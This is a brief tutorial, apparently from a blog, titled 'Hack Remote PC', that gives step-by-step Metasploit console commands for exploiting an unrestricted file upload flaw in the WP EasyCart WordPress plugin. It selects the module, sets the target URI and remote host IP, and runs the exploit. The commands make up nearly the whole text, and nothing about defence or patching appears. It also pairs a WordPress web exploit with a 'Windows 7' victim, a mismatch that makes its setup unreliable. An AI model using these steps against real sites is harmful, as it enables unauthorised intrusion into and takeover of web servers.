Hack Remote PC using WordPress WP EasyCart Unrestricted File Upload


Exploit Targets
wp-easycart

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole



Now type use exploit/unix/webapp/wp_easycart_unrestricted_file_upload
msf exploit (wp_easycart_unrestricted_file_upload)>set targeturi wordpress
msf exploit (wp_easycart_unrestricted_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_easycart_unrestricted_file_upload)>exploit       

0 comments:

Post a Comment